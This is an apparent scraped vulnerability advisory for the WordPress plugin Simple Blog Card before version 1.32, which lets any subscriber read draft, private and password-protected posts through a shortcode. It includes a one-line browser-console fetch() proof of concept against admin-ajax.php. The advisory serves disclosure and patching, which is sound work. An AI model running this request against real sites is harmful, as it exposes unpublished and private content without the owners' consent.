Lucene search

K
wpvulndbErwan LR (WPScan)WPVDB-ID:DE3E1718-C358-4510-B142-32896FFEB03F
HistoryAug 07, 2023 - 12:00 a.m.

Simple Blog Card < 1.32 - Subscriber+ Arbitrary Post Access

2023-08-0700:00:00
Erwan LR (WPScan)
wpscan.com
3
blog card plugin
unauthorized access
subscriber users
shortcode vulnerability

4.8 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

14.1%

Description The plugin does not ensure that posts to be displayed via a shortcode are public, allowing any authenticated users, such as subscriber, to retrieve arbitrary post title and their content such as draft, private and password protected ones

PoC

Run the below command in the developer console of the web browser while being on the blog as a subscriber user fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: “action=parse-media-shortcode&shortcode;=[simpleblogcard url=‘?p=53’]”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); 53 being the ID of a draft/private/password protected post

CPENameOperatorVersion
eq1.32

4.8 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

14.1%

Related for WPVDB-ID:DE3E1718-C358-4510-B142-32896FFEB03F